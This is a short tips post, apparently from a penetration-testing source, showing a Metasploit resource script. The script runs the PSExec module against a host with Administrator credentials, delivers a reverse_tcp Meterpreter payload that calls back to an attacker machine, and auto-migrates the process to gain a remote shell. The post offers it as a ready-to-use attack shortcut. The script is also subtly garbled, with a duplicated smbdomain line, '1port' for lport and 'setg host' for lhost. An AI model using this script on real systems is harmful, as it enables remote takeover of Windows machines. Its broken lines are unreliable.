Cybersecurity TIPS AND TRICKS

RC SCRIPTS WITHIN METASPLOIT

Since I try to encourage efficiency, some script that you should look into are Metaploit's resource (RC) scripts. These scripts can be created to help speed up common task you might perform.

for example, I am creating a script to use the PSExec module, use smart_migrate to migrate the Meterpreter process into another PID, and set all the fill-in other information required for the attack.

We will save the following code to demo.rc:

• use exploit/windows/smb/psexec
• set rhost 192.168.10.10
• set smbuser Administrator
• set smbdomain ____ hash____ or password
• set smbdomain______domain______
• set payload windows/meterpreter/reverse_tcp
• set AutoRunScript post/windows/manage/smart_migrate
• set 1port 443
• setg host 192.168.10.3

To run the script, from a shell prompt enter:

• msfconsole -r/root/demo.rc

All you have to do after it loads is type: exploit. This script starts up Metasploit, authenticates to 192.168.10.10 using PSEec, drops and executes the Meterpreter payload, and connects that box back to your host togain a full meterpreter shell.

This is a much faster way to prepare your scripts, exploits, and especially handlers. I like to add features like auto-migrate or add custom payloads to exploits.